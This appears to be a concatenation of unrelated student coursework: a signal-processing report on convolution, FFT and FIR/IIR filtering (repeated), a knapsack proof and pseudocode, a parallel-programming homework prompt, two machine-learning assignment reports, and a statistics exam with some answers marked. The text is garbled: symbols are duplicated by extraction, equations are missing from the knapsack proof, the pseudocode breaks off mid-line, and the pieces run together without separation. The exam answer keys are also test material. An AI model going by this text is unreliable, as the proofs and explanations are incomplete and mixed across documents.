Vikranth Udandarao 2022570 1. To compare the manual convolution with the result from np.convolve(), both were computed and plotted on the same graph. The manual convolution was performed using nested loops to apply the convolution sum directly, while np.convolve() used NumPy’s built-in convolution function, which is optimized for performance. In the plot, we differentiate the two methods by using distinct colors and line widths: the manual convolution is shown with a thicker blue line, and the np.convolve() result is depicted with a thinner red line. Both methods yield nearly identical results, which visually overlap on the plot, indicating that the manual approach correctly implements the convolution process.2.3. . Prominent Frequency Components: ○ The FFT magnitude spectrum clearly shows two primary peaks: ■ One at 5 Hz. ■ The second at 12 Hz. ○ These frequencies correspond exactly to the frequencies f1=5 Hz and f2=12 Hz that were used to construct the signal in the time domain. Amplitudes of the Peaks: ○ The peak at 5 Hz has a magnitude of approximately 32. This is consistent with the fact that the cosine term has an amplitude of 1. In the FFT, the magnitude of this peak is scaled by the number of samples NNN, which results in a larger peak. ○ The peak at 12 Hz has a magnitude of approximately 16. This corresponds to the second cosine term where the amplitude is 0.5. The FFT shows a peak half as large as the one at 5 Hz, which matches the expected amplitude scaling. Symmetry of the Spectrum: ○ The full FFT result (first plot) is symmetric around 0 Hz, with peaks appearing at both positive and negative frequencies. This is a direct consequence of the fact that the signal x[n]x[n]x[n] is real-valued, leading to conjugate symmetry in the frequency domain. ○ The second plot focuses on the positive frequencies, showing only the significant frequency components at 5 Hz and 12 Hz.4. …The Gaussian pulse x(t) is a smoothly varying signal in the time domain. Its magnitude spectrum, obtained through the Fast Fourier Transform (FFT), reveals several important characteristics about the frequency content of the pulse. Gaussian Shape in the Frequency Domain: a. The FFT of a Gaussian pulse results in another Gaussian-shaped magnitude spectrum in the frequency domain. This property arises because the Fourier Transform of a Gaussian function is also a Gaussian. The spectrum is centered at 0 Hz, reflecting that the pulse is a low-frequency signal with most of its energy concentrated around zero frequency. Dominance of Low-Frequency Components: b. The bell-shaped spectrum shows that the energy of the Gaussian pulse is primarily concentrated at low frequencies. The amplitude decreases rapidly as we move away from 0 Hz. This indicates that the Gaussian pulse is composed mainly of low-frequency components, which corresponds to its smooth and continuous nature in the time domain. Width of the Frequency Spectrum: c. The width of the magnitude spectrum depends on the parameter σsigmaσ, which controls the width of the Gaussian pulse in the time domain. In this case, with σ=0.1sigma = 0.1σ=0.1, the spectrum is relatively wide in the frequency domain. According to the time-frequency uncertainty principle, a narrower pulse in the time domain (small σsigmaσ) results in a broader frequency spectrum. d. If σsigmaσ were larger, the time-domain pulse would be wider, and the corresponding frequency spectrum would be narrower, concentrating more energy near 0 Hz. Interpretation of Frequency Components: e. 
The central peak around 0 Hz indicates the strong presence of DC (low-frequency) components, while the rapid decay of the spectrum indicates minimal contributions from higher frequencies. This reflects that the Gaussian pulse is smooth and doesn’t exhibit rapid changes, which would require higher frequency components. 5.FIR Filter (Finite Impulse Response) 1. Time Domain Behavior: ○ The FIR filter attenuates the high-frequency component at 100 Hz while retaining the 10 Hz component, as seen in the FIR-filtered signal plot. 2. Frequency Domain Behavior: ○ In the frequency domain, the 100 Hz component is clearly attenuated in the FFT of the FIR-filtered signal, while the 10 Hz component is preserved. However, the attenuation at 100 Hz is not complete, and some leakage is visible. ○ The frequency response of the FIR filter shows a gradual roll-off after the 50 Hz cutoff frequency, and as a result, the filter does not entirely remove components near the cutoff, which is a common issue in finite-length FIR filters. This makes the filtering less sharp than with an IIR filter. IIR Filter (Infinite Impulse Response) 1. Time Domain Behavior: ○ The IIR filter effectively removes the high-frequency 100 Hz component and retains the 10 Hz component with minimal distortion. Compared to the FIR filter, the IIR filter introduces significantly less delay and closely matches the low-frequency content of the original signal. ○ The IIR filter achieves this with fewer coefficients, making it computationally more efficient than the FIR filter. However, recursive IIR filters can introduce phase shifts, although using zero-phase filtering (filtfilt) here minimizes this issue. 2. Frequency Domain Behavior: ○ The FFT of the IIR-filtered signal shows complete suppression of the 100 Hz component, while the 10 Hz component is preserved cleanly, indicating the IIR filter’s sharper frequency cutoff. ○ The frequency response of the IIR filter shows a much steeper roll-off after 50 Hz, which results in better attenuation of higher frequencies compared to the FIR filter. The IIR filter performs better in suppressing unwanted frequencies while retaining the desired low-frequency components. Comparison of FIR and IIR Filters: 1. Attenuation Efficiency: ○ Both the FIR and IIR filters effectively suppress the high-frequency component at 100 Hz, but the IIR filter achieves sharper attenuation, as evidenced by the frequency response and FFT plots. ○ The FIR filter’s gradual roll-off leads to some residual presence of the 100 Hz component in the frequency spectrum, whereas the IIR filter eliminates it more effectively. 2. Delay and Phase Distortion: ○ The IIR filter, being recursive, introduces minimal delay while still suppressing the high-frequency content, making it more suitable for real-time applications that require lower latency. Phase distortion can be a concern in IIR filters, but the use of zero-phase filtering (filtfilt) avoids this. 3. Computational Efficiency: ○ The FIR filter requires more coefficients and thus more computational resources to achieve similar performance compared to the IIR filter. ○ The IIR filter is more computationally efficient, as it uses fewer coefficients to achieve a sharper cutoff and better attenuation of high frequencies.
This assignment has in total 55 base points and 10 extra points, and the cap is 55. Bonus questions are indicated using the ⋆ mark. Please specify the following information before submission: • Your Name: Yufeng Xu • Your NetID: yx3038 Problem 1: Infinite knapsack [10⋆ +15 pts] (a)⋆ Prove that in any optimal solution (n1,…,nm), the total number of copies of the items I2,…,Im included in the knapsack is at most wmax − 1, i.e., (b) Based on the conclusion of (a), design an algorithm Knapsack(m,W,(w1,v1),…,(wm,vm)) for infinite knapsack with running time ). For convenience, your algorithm only need to return the maximum value achieved. Describe the basic idea and give the pseudocode. Briefly justify the correctness and analyze the time complexity. (Hint: According to (a), we know that, in an optimal solution, the total weight of the items ), and hence the item I1 occupies “most” space of the knapsack. Try to combine this observation with the O(mW)-time DP algorithm.) Solution. Please write down your solution to Problem 1 here. (a) We prove the problem by contradiction. Suppose there exists an optimal solution where . We denote these items as where n ≥ wmax, and for each , ∃i = 2,…,m such that wj′ = wi. There can be multiple wj′ s that are equal to the same wi. Now, we want to show that ∃1 ≤ l ≤ r ≤ n such that is a multiple of w1. Consider the sum of the first k wj′ s, denoted as . Assume Sk ≡ Rk(mod w1), where Rk = 0,1,…,w1−1. (i) if ∃k such that Rk = 0, then take is a multiple of w1. (ii) if ∄k such that Rk = 0, Rk can only take w1 − 1 possible values. Because n ≥ wmax ≥ w1 ≥ w1 − 1, by the Pigeon-hole Principle, ∃k1,k2 such that Rk1 = Rk2, hence take w1). Next, we can take 1 ≤ l ≤ r ≤ n such that . Therefore, we can replace with t w1’s, and the final value is going to be larger, which is contradictory to our assumption that the original solution is optimal. Therefore, , i.e., (b) We know from (a) that 1, hence . Consider the naive infinite knapsack algorithm. Let DP(i,w) represent the maximul value by choosing from items {i,i + 1,…,m} with total weight w. Because we can either take ni the i-th item or take none of them, DP(i,w)=max{DP(i + 1,w), vi+DP(i,w − wi)}. Because i = 1,2,…,m, w = 0,1,…,W, hence this algorithm is of time complexity O(nW). Now, with the conclusion from (a), we can limit the search space of w for i = 2,…,m to . Then, the global maximum is equal to maxw{DP(2,w . For items 2,…,m, given any total weight limit w, with the infinte knapsack problem, we can obtain the optimal solution that maximizes the total value of the items chosen. For the whole problem, we learned from (a) that the total weight of items 2,…,m ≤ wmax2. Therefore, we can limit the total for 2,…,m to wmax2 and simply take as many item 1 as possible for the weight limit we haven’t used. By using this method, we can obtain the correct optimal solution. Because the weight limit for item 2,…,m shrinks from , and it takes O(1) time to add item 1 to the partial solution, the time complexity of the revised algorithm is Below is the pseudocode: def KNAPSACK(m, W, I ): # I is a l i s t of (w, v ) ’ s I = sorted(I , key=lambda x : x . v / x .w) w max = max([ item .w for item in I ]) DP = [[0 for w in range(w max ∗∗ 2)] for idx in range(m + 1)] # m+1 is set to handle boundary cases for idx in range(m − 1 , 0 , −1): for w in range(w max ∗∗ 2 + 1): if w >= I [ idx ] .w: DP[ idx ] [w] = max( I [ idx ] . 
CSC718 Operating Sys & Parallel Programming
Homework 4: MPI, OpenMP, and GPU Programming Assignments
Total: 100 points

The homework assignment will be graded based on the following criteria:
• Accuracy: 1) the solution meets the specific requirements in the problem description; 2) the solution produces correct results; 3) the procedures adopted in the solution are technically sound.
• Efficiency: efficiency will be one of the criteria when grading programming assignments. The solution should produce the desired results efficiently.
• Effort/neatness: the solution shows excellent effort, and all related work is presented neatly and organized well.

Homework assignment feedback will be available through the DropBox folder on D2L. For all the programming assignments, you can choose any operating system you want. I will usually provide C/C++ samples for the programming assignments. If you prefer to use other languages, e.g., Java, they are accepted too. A README.txt is required for any programming assignment you submit. In the README.txt, you need to provide the following information: 1) How to compile your program? 2) How to run your program? 3) What is the average running time of your program? 4) What are the expected output results when I run your program? Zip all your source code, project files, supporting files, and README.txt and submit the all-in-one zip file to the D2L Dropbox. If you have any questions about the homework, please let me know.

(10 points) What are the strengths and limitations of GPU programming?

(15 points) Among the four parallel frameworks we discussed in class (multithreaded programming, MPI programming, OpenMP programming, and GPU programming, e.g., CUDA), what strategies would you use in general when selecting a parallel framework for your applications?

(10 points) Benchmarking of a sequential program reveals that 95 percent of the execution time is spent inside functions that are amenable to parallelization. What is the maximum speedup we could expect from executing a parallel version of this program on 10 processors using Amdahl's Law?

The "acceptable" identifier must meet the following constraints:
• The identifier is a six-digit combination of the numerals 0-9

1. (15 points) Write a sequential program to count the different identifiers given these constraints.
2. (20 points) Convert the sequential program to an MPI parallel program.
3. (20 points) (choose only one: A or B, not both)
   A. Convert the sequential program to an OpenMP parallel program.
   B. Convert the sequential program to a GPU program using a parallel framework of your choice (e.g., CUDA, OpenCL, etc.)
4. (10 points) Benchmark the three programs based on your choice in 3).

Problem                      | 1 process / 1 thread | 2 processes / 2 threads | 3 processes / 3 threads | 4 processes / 4 threads
Program1.c (sequential)      |                      | n/a                     | n/a                     | n/a
Program2.c (MPI)             |                      |                         |                         |
Program3.c (OpenMP or CUDA)  |                      |                         |                         |
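The course samples are C/C++, but other languages are accepted, so below is a minimal sketch (not a graded solution) of the range-splitting MPI decomposition for the identifier-counting task, written with Python's mpi4py bindings. The is_acceptable() predicate and the file name count_ids_mpi.py are placeholders, since only the first constraint is reproduced above.

    # count_ids_mpi.py -- illustrative sketch only; is_acceptable() is a placeholder
    # because only the six-digit constraint is shown in this excerpt.
    from mpi4py import MPI

    def is_acceptable(identifier):
        return True          # placeholder: accept every combination 000000-999999

    def main():
        comm = MPI.COMM_WORLD
        rank, size = comm.Get_rank(), comm.Get_size()
        total = 10 ** 6                              # all six-digit combinations
        chunk = (total + size - 1) // size           # split the range across the ranks
        lo, hi = rank * chunk, min((rank + 1) * chunk, total)
        local = sum(1 for i in range(lo, hi) if is_acceptable(i))
        grand = comm.reduce(local, op=MPI.SUM, root=0)   # combine the partial counts
        if rank == 0:
            print("acceptable identifiers:", grand)

    if __name__ == "__main__":
        main()

Run with, e.g., mpiexec -n 4 python count_ids_mpi.py; the same decomposition carries over directly to a C/MPI version using MPI_Reduce.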
CS771A Assignment 3
The Boys: Rajarshi Dutta (200762), Udvas Basak (201056), Shivam Pandey (200938)

1 Question 1
The first part of the solution uses a linear model, Elastic Net regression, which combines the Ridge regression penalty (L2 loss) and the Lasso regression penalty (L1 loss). The objective/loss function of the model is

C(w) = argmin_w { ||y - Xw'||_2^2 + α (λ1 ||w'||_2^2 + λ2 ||w'||_1) }    (1)

where,
• w' = weights multiplied with each of the features of the dataset used to construct the regression model.
• α = constant that multiplies both the lasso and ridge penalties.
• λ1 = regularization parameter for the Ridge regression penalty.
• λ2 = regularization parameter for the Lasso regression penalty.

During regularization, the lasso (L1) part of the penalty drives some coefficients to exactly zero and therefore produces a sparse model, whereas the quadratic (ridge) part makes the regularization path more stable, reduces the number of variables that need to be selected, and thereby promotes the grouping effect. The grouping effect lets correlated variables be identified together, which improves the sampling procedure. The method first finds the Ridge regression coefficients and then performs a second step that applies a Lasso-style shrinkage to those coefficients.

In order to determine the best-performing linear model, the Randomized Search Cross Validation technique was applied for efficient hyperparameter selection over the following sets of hyperparameters. Here grid is a dictionary whose keys are the hyperparameters of the Elastic Net regression model and whose values are the candidate settings.

grid = dict()
grid['alpha'] = [1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 0.0, 0.2, 1.0]
grid['l1_ratio'] = np.arange(0, 1, 0.01)
grid['selection'] = ['cyclic', 'random']
grid['max_iter'] = [2, 10, 100, 1000]
grid['tol'] = [1e-4, 1e-3, 1e-5, 1e-2, 1e-1, 0.0]

The Randomized Search Cross Validation returns the best estimator with the following hyperparameters:

ElasticNet(alpha=0.1, l1_ratio=0.62, selection='random', tol=0.001, warm_start=True)

The corresponding MAE scores on the training data are 5.6248 (for the O3 levels) and 6.5136 (for the NO2 levels) respectively.

2 Question 2
A suitable non-linear model which can effectively fit the given dataset is the K Nearest Neighbours (KNN) algorithm. KNN can be used both as a classification and as a regression model; it predicts for an unknown data point based on its distance to the k nearest data points. The model can work with several distance metrics, such as the Euclidean, Minkowski, and Manhattan distances. One strength of the KNN regression algorithm that we would like to draw attention to is its ability to work well with non-linear relationships. In regression tasks, the algorithm chooses the k nearest points under the given distance metric and predicts the new point to be approximately the average of these nearest points. In the distance-weighted k-nearest-neighbour rule, each neighbour is additionally given a weight that decreases as the sample-to-neighbour distance increases.

Here, the optimal value of K has been determined by plotting the Train MAE loss and Test MAE loss for both the O3 and NO2 sensor values.
The MAE loss variation for different k values is shown below.

Figure 1: MAE loss variation for K values

We find that the KNN Regressor gives the minimum mean absolute error for a k value of 5.

model = KNeighborsRegressor(n_neighbors=5, p=1, algorithm="auto", n_jobs=-1)

Some other models tested for the given regression problem include XGBoost, Multi-layer Perceptron, and Random Forest Regressor models.
• XGBoost Regressor: XGBoost uses a combination of two techniques, gradient boosting and tree boosting, to improve the accuracy of the model. Gradient boosting involves minimizing the loss function (mean absolute error) by iteratively adding weak learners (e.g., decision trees) to the model. Tree boosting, on the other hand, involves optimizing the split points of the decision trees by minimizing the loss function.
• Random Forest Regressor: The algorithm works by creating a large number of decision trees, each of which is trained on a subset of the data and a subset of the features. The final prediction is then made by averaging the predictions of all the trees in the forest. Random forest regression also includes several regularization techniques to prevent overfitting and improve the generalization of the model. These techniques include maximum depth, minimum samples per leaf, and maximum features.
• Artificial Neural Network: The network consists of three hidden layers with 64, 32, and 8 units. The optimizer used is Adam, the kernel initialisation is He uniform, and the loss function is the mean absolute error loss. The network is trained with backpropagation for around 100 epochs on the training data with a batch size of 64.

Non-linear Models        | O3 MAE loss | NO2 MAE loss
K Neighbours Regressor   | 3.3284      | 2.3228
XGBoost Regressor        | 5.1433      | 4.7230
Random Forest Regressor  | 6.0784      | 5.3145
MultiLayer Perceptron    | 4.8807      | 4.9178
Table 1: Stats of different non-linear models

3 Question 3
The code is available in the submit.py file. The code snippet is given below:

import numpy as np
import pickle as pkl

# Define your prediction method here
# df is a dataframe containing timestamps, weather data and potentials
def my_predict(df):
    X = np.array(df.iloc[:, 1:])
    # Load your model file
    model = pkl.load(open("knn_model.pkl", "rb"))
    test_preds = np.transpose(model.predict(X))
    # Make two sets of predictions, one for O3 and another for NO2
    pred_o3, pred_no2 = test_preds[0], test_preds[1]
    # Return both sets of predictions
    return (pred_o3, pred_no2)
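For context, here is a minimal companion sketch (not part of the submission) of how knn_model.pkl could have been produced so that my_predict() above works. The column layout is assumed, not given in the write-up: column 0 holds the timestamp and the last two columns hold the O3 and NO2 targets.

    # train_knn.py -- illustrative sketch; the real training script is not shown above.
    import numpy as np
    import pickle as pkl
    from sklearn.neighbors import KNeighborsRegressor

    def train_and_save(train_df, model_path="knn_model.pkl"):
        X = np.array(train_df.iloc[:, 1:-2])      # feature columns (assumed layout)
        y = np.array(train_df.iloc[:, -2:])       # [O3, NO2] targets, fitted jointly (multi-output)
        model = KNeighborsRegressor(n_neighbors=5, p=1, algorithm="auto", n_jobs=-1)
        model.fit(X, y)
        pkl.dump(model, open(model_path, "wb"))   # loaded later by my_predict()
        return model

Because the regressor is fitted on both targets at once, model.predict(X) returns an (n_samples, 2) array, and the transpose in my_predict() yields the O3 row and the NO2 row.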
CS771A Assignment 2
The Boys: Rajarshi Dutta (200762), Udvas Basak (201056), Shivam Pandey (200938)

1 Solution 1
1.1 Theory

Figure 1: Illustration of a working ID3 algorithm

We have used the Iterative Dichotomizer (ID3) decision tree algorithm, one of the most widely used algorithms for supervised machine-learning classification tasks. The algorithm works by recursively partitioning the training data based on their attributes until the decision tree produces the purest splits (referred to as the leaves). ID3 uses a top-down greedy approach to build the decision tree: the tree is constructed from the top, and the greedy approach means that at each iteration the best feature is selected to split the node.

1.2 Our approach
The decision tree constructed to solve the given Wordle-Solvr problem consists of the following components:

1.2.1 process_node
• For the process_node function, every non-root node of the constructed ID3 tree is considered and passed through the get_entropy function, which finds the index of the vocabulary entry that reduces entropy the most, i.e. maximizes the information gain. This index is used to access the most appropriate query to ask at that step.
• All words are extracted from the list all_words, and the reveal function uncovers the mask between the query and the required word, which is stored in split_dict as the key. The value in split_dict is an array of indices that produce the given mask when queried.

get_entropy
• The get_entropy function iterates over all of the words present in that node (the possible candidate queries) and passes the array to the function calc_entropy, which returns the entropy of the current node.
• Another dictionary is maintained which, given a mask, records the number of queries that produce that particular mask when queried with the word. These values are used to calculate the weighted sum of entropies after splitting the node.
• The difference between the initial entropy calculated for the parent node and the weighted sum of entropies after splitting the node gives the information gain used to produce the best split over all words:

IG(S, A) = E(S) - Σ_{v ∈ V} (|S_v| / |S|) · E(S_v)    (1)

where V = possible values of attribute A, S = set of examples X, and S_v = the subset where X_A = v.
• Information gain indirectly describes the mutual information between the attribute and the class labels of S.

calc_entropy
• This function simply calculates the Shannon entropy

E(S) = - Σ_p p · log2(p)    (2)

where p ranges over the probabilities of the class labels produced by the corresponding split on the attribute.

2 Solution 2
The entire algorithm has been implemented in the submit.py file.
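As a minimal sketch (not the code in submit.py) of the two helpers described in Section 1.2, assuming a reveal(query, word) function that returns the feedback mask of a query against the hidden word; the names follow the write-up, and every candidate word is treated as equally likely:

    import math
    from collections import defaultdict

    def calc_entropy(words):
        # Shannon entropy of a node under a uniform distribution over candidates
        p = 1.0 / len(words)
        return -sum(p * math.log2(p) for _ in words)      # equals log2(len(words))

    def get_entropy(words, reveal):
        # Return the query with the largest information gain, i.e. the largest drop
        # from the parent entropy to the weighted sum of child entropies (Eq. (1)).
        parent = calc_entropy(words)
        best_query, best_gain = None, -1.0
        for query in words:
            split_dict = defaultdict(list)                # mask -> candidate words giving that mask
            for word in words:
                split_dict[reveal(query, word)].append(word)
            weighted = sum(len(s) / len(words) * calc_entropy(s) for s in split_dict.values())
            if parent - weighted > best_gain:
                best_query, best_gain = query, parent - weighted
        return best_query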
Write your name and section number at the top right of this page:

Class           Section Number
Bret 8:50       001
Sahifa 1:20     003
Miranda 9:55    004
Sahifa 3:30     005
Sahifa 8:50     006
Cameron 1:20    007

As you complete the exam, write your initials at the top right of each other page. If you need more room, there is a blank page at the end of the exam, or we can give you some scratch paper. Some multiple choice questions are "Select ONE" while others are "Select ALL that apply". Pay attention to the question type and only mark one option if it says "Select ONE". Fill in the circles completely.

1. A dataframe lions has 32 rows, each representing a unique lion. It has two numeric columns: age, each lion's age in decimal years, and proportion.black, the percentage of that lion's nose which is black. Finally, it has a logical column adult, which is TRUE if age is greater than 3 and FALSE otherwise. Consider the following code which attempts to make a scatter plot of age on the x axis vs. proportion.black on the y axis. Which of the following statements are true about errors in the above code? Select ALL that apply.
   fill = adult must be changed to color = adult to color the points differently.
   alpha = 0.5 must be moved outside of aes(), like size = 2 currently is.
   size = 2 must be moved within aes(), like alpha = 0.5 is.
   fill = adult must be moved to the aes() in the ggplot() call, not geom_point().

2. Using the same dataframe as Question 1, consider the following code which creates a new dataframe, lions summary. Which of the following statements are true about lions summary? Select ALL that apply.
   lions summary has 2 rows.
   lions summary has 2 columns. (False: adult, averageAge, and averagePropBlack.)
   lions summary has a column called adult.
   If there were any NA values in the age column of lions, all the values of averageAge in lions summary will be NA. (Sneakily false: if there are only NA values in one category of adult, the other can still function!)

3. A random viewer's ideal movie length, in minutes, is approximately X ∼ N(120, 15). Actual movie lengths are given by Y ∼ N(143, 19).
   (a) Which R code below calculates the probability that a random movie is shorter than the 40th percentile for ideal movie length? Select ONE.
      qnorm(0.4, 120, 15) %>% pnorm(143, 19)
      qnorm(0.4, 143, 19) %>% pnorm(120, 15)
      pnorm(0.4, 120, 15) %>% qnorm(143, 19)
      pnorm(0.4, 143, 19) %>% qnorm(120, 15)
   (b) What movie length y corresponds to a z-score of 1? Select ONE.
      19    143    124    162 (143 + 19 = 162)

4. Your friend claims that a random variable, X, follows the following probability distribution: Which of the following are true about your friend's claim? Select ONE.
   This distribution has negative values of x, therefore X is not a random variable.
   This distribution has negative values of P(X = x), therefore X is not a random variable.
   The area under this distribution is not 1, therefore X is not a random variable.
   X is a valid random variable.

5. Consider ordering a "footlong" (12 inch) sub from Subway. Consider trying to estimate µ, the average length of the sub you receive when you order a 12 inch sub. You do this by ordering 40 footlong subs and measuring their lengths in inches. (What a great problem this is.) You observe that the average length of your 40 subs is 11.5 inches, and the standard deviation of their lengths is 0.4 inches. Consider testing H0 : µ = 12 vs. Hα : µ < 12. Write a numeric expression (only containing numbers and arithmetic symbols like + and ×) for the test statistic of this test, (x̄ − µnull) / (sx / √n).
   Answer:
6. The fictitious distribution of the number of children in a household (X) is given below.

x          0      1      2      3
P(X = x)   ?      0.4    0.25   0.15

   (a) Which of the following statements about X is true? Select ONE.
      X is a discrete RV.    X is a binomial RV.    X is a continuous RV.    X is a normal RV.
   (b) What value of P(X = 0) makes this a valid probability distribution? Select ONE.
      0.1    0.15    0.2    0.25
   (c) What is the median number of children per household? Select ONE.
      0    1    2    Not enough information to determine

7. Data is collected on the duration each winter that a lake's surface is frozen over a period of 103 consecutive years. The correlation coefficient between the variables is r = −0.4. The year variable has a mean x̄ = 1950 and a standard deviation sx = 30. The freeze duration variable has ȳ = 90 and a standard deviation sy = 17. Consider fitting a simple linear regression model to this data. Write a numerical expression (using only numbers and arithmetic symbols like + or ×) for the predicted freeze duration in the year 1890. No need to simplify.
   Answer: 90 + (−0.4) × (−2) × 17
   (1890 is two x standard deviations BELOW the mean of x, so our predicted value will be r times two y standard deviations below the mean of y. You could also take the long way: β̂1 = (−0.4) × 17/30 and β̂0 = 90 − β̂1 × 1950, so ŷ1 = β̂0 + β̂1 × 1890.)

8. We continue to consider the lake freezing data from Problem 7. A 95% confidence interval for the freeze duration of the true regression line at x = 1890 has the form ŷ1 ± c × SEC. A 95% prediction interval for the duration that the lake was frozen in the single year 1890 has the form ŷ1 ± c × SEP, where c is a critical value from some distribution and SEC, SEP are some positive values. Reminder: There are 103 years in the dataset. Which R code calculates the numeric critical value c? Select ONE.
   qnorm(0.95)    qnorm(0.975)    qt(0.95, 101)    qt(0.975, 101)    qt(0.95, 102)    qt(0.975, 102)

9. Using the expressions from the previous problem, circle the true relationship between SEC and SEP and briefly explain why.
   SEC < SEP    SEC = SEP    SEC > SEP
   Answer: A confidence interval for the height of the regression line is narrower than a prediction interval at the same x value, but they have the same center and critical value. Therefore, it must be that SEC < SEP.

10. Consider trying to estimate the proportion of UW-Madison undergraduate students who will graduate at the end of this semester, p. You ask 50 random students, and 7 of them will graduate at the end of the semester. Consider using this information to calculate a confidence interval for p. Which of the following statements are true? Select ALL that apply.
   If we were to calculate an Agresti-Coull confidence interval for p, its center would be (7 + 1)/(50 + 2). (False: it would be (7 + 2)/(50 + 4).)
   If we were to calculate a Wald confidence interval for p, its center would be 7/50.
   The upper bound of the Agresti-Coull confidence interval would be greater than the upper bound of the Wald confidence interval. (It is shifted towards 0.5.)
   As we increase the confidence level of our interval towards 100%, our interval would widen and approach [0, 1].

11. We are interested in comparing the proportions of individuals with bachelor degrees among adult men aged 25 and older in the states of Minnesota and Wisconsin. Let pM and pW represent these two population proportions. In random samples of nM = 300 Minnesota men and nW = 400 Wisconsin men aged 25 and older, the numbers of individuals with bachelor degrees are xM = 90 and xW = 100.
Without simplification, write a numerical expression using the provided data for the standard error SEci used in a 95% confidence interval for pM − pW of the form (point estimate) ± zcrit × SEci when using the Agresti-Coull method.
   Answer: SEci =

12. In the setting of the problem above, write a numerical expression using the provided data for the standard error SEht of the test statistic Z = (p̂M − p̂W) / SEht ∼ N(0, 1).
   Answer: SEht =

13. Suppose that the test statistic from the previous problem has the value z = 1.47 and that the p-value from a two-sided test is 0.14. Which of the following statements are true? Select ALL that apply.
   The test is statistically significant at an α = 0.05 level.
   A 95% confidence interval for pM − pW will contain the value 0. (Insignificant p-value.)

14. You ask a group of 30 people from Country A to each privately give you a random number between 1 and 1000. You then ask a group of 40 people from Country B to each privately give you a random number between 1 and 1000. Let µA be the true average value that all members of Country A would give upon this request, and similarly for µB. You are interested in the quantity µA − µB. Which of the following statements are true about how to approach this problem through statistical inference? Select ONE.
   Two-sample means inference is impossible to conduct because the sample sizes are different.
   Two-sample means inference is impossible to conduct because the random variables are technically discrete.
   Two-sample inference is more appropriate than paired-sample inference in this case.
   Paired-sample inference is more appropriate than two-sample inference in this case.

15. Assume the correct value of the test statistic from problem 14 is -50. Which R code correctly calculates the p-value for this test? Select ONE.
   pt(-50, df = W)
   2*pt(-50, df = W)
   2*pt(abs(-50), df = W)
   1 - pt(-50, df = W)
Vikranth Udandarao 2022570

1. To compare the manual convolution with the result from np.convolve(), both were computed and plotted on the same graph. The manual convolution was performed using nested loops to apply the convolution sum directly, while np.convolve() used NumPy's built-in convolution function, which is optimized for performance. In the plot, we differentiate the two methods by using distinct colors and line widths: the manual convolution is shown with a thicker blue line, and the np.convolve() result is depicted with a thinner red line. Both methods yield nearly identical results, which visually overlap on the plot, indicating that the manual approach correctly implements the convolution process.

2.

3. Prominent Frequency Components:
   ○ The FFT magnitude spectrum clearly shows two primary peaks: one at 5 Hz and a second at 12 Hz.
   ○ These frequencies correspond exactly to the frequencies f1 = 5 Hz and f2 = 12 Hz that were used to construct the signal in the time domain.
   Amplitudes of the Peaks:
   ○ The peak at 5 Hz has a magnitude of approximately 32. This is consistent with the fact that the cosine term has an amplitude of 1. In the FFT, the magnitude of this peak is scaled by the number of samples N, which results in a larger peak.
   ○ The peak at 12 Hz has a magnitude of approximately 16. This corresponds to the second cosine term, where the amplitude is 0.5. The FFT shows a peak half as large as the one at 5 Hz, which matches the expected amplitude scaling.
   Symmetry of the Spectrum:
   ○ The full FFT result (first plot) is symmetric around 0 Hz, with peaks appearing at both positive and negative frequencies. This is a direct consequence of the fact that the signal x[n] is real-valued, leading to conjugate symmetry in the frequency domain.
   ○ The second plot focuses on the positive frequencies, showing only the significant frequency components at 5 Hz and 12 Hz.

4. The Gaussian pulse x(t) is a smoothly varying signal in the time domain. Its magnitude spectrum, obtained through the Fast Fourier Transform (FFT), reveals several important characteristics about the frequency content of the pulse.
   a. Gaussian Shape in the Frequency Domain: The FFT of a Gaussian pulse results in another Gaussian-shaped magnitude spectrum in the frequency domain. This property arises because the Fourier Transform of a Gaussian function is also a Gaussian. The spectrum is centered at 0 Hz, reflecting that the pulse is a low-frequency signal with most of its energy concentrated around zero frequency.
   b. Dominance of Low-Frequency Components: The bell-shaped spectrum shows that the energy of the Gaussian pulse is primarily concentrated at low frequencies. The amplitude decreases rapidly as we move away from 0 Hz. This indicates that the Gaussian pulse is composed mainly of low-frequency components, which corresponds to its smooth and continuous nature in the time domain.
   c. Width of the Frequency Spectrum: The width of the magnitude spectrum depends on the parameter σ, which controls the width of the Gaussian pulse in the time domain. In this case, with σ = 0.1, the spectrum is relatively wide in the frequency domain. According to the time-frequency uncertainty principle, a narrower pulse in the time domain (small σ) results in a broader frequency spectrum.
   d. If σ were larger, the time-domain pulse would be wider, and the corresponding frequency spectrum would be narrower, concentrating more energy near 0 Hz.
   e. Interpretation of Frequency Components:
The central peak around 0 Hz indicates the strong presence of DC (low-frequency) components, while the rapid decay of the spectrum indicates minimal contributions from higher frequencies. This reflects that the Gaussian pulse is smooth and doesn't exhibit rapid changes, which would require higher frequency components.

5. FIR Filter (Finite Impulse Response)
   1. Time Domain Behavior:
      ○ The FIR filter attenuates the high-frequency component at 100 Hz while retaining the 10 Hz component, as seen in the FIR-filtered signal plot.
   2. Frequency Domain Behavior:
      ○ In the frequency domain, the 100 Hz component is clearly attenuated in the FFT of the FIR-filtered signal, while the 10 Hz component is preserved. However, the attenuation at 100 Hz is not complete, and some leakage is visible.
      ○ The frequency response of the FIR filter shows a gradual roll-off after the 50 Hz cutoff frequency, and as a result, the filter does not entirely remove components near the cutoff, which is a common issue in finite-length FIR filters. This makes the filtering less sharp than with an IIR filter.
   IIR Filter (Infinite Impulse Response)
   1. Time Domain Behavior:
      ○ The IIR filter effectively removes the high-frequency 100 Hz component and retains the 10 Hz component with minimal distortion. Compared to the FIR filter, the IIR filter introduces significantly less delay and closely matches the low-frequency content of the original signal.
      ○ The IIR filter achieves this with fewer coefficients, making it computationally more efficient than the FIR filter. However, recursive IIR filters can introduce phase shifts, although using zero-phase filtering (filtfilt) here minimizes this issue.
   2. Frequency Domain Behavior:
      ○ The FFT of the IIR-filtered signal shows complete suppression of the 100 Hz component, while the 10 Hz component is preserved cleanly, indicating the IIR filter's sharper frequency cutoff.
      ○ The frequency response of the IIR filter shows a much steeper roll-off after 50 Hz, which results in better attenuation of higher frequencies compared to the FIR filter. The IIR filter performs better in suppressing unwanted frequencies while retaining the desired low-frequency components.
   Comparison of FIR and IIR Filters:
   1. Attenuation Efficiency:
      ○ Both the FIR and IIR filters effectively suppress the high-frequency component at 100 Hz, but the IIR filter achieves sharper attenuation, as evidenced by the frequency response and FFT plots.
      ○ The FIR filter's gradual roll-off leads to some residual presence of the 100 Hz component in the frequency spectrum, whereas the IIR filter eliminates it more effectively.
   2. Delay and Phase Distortion:
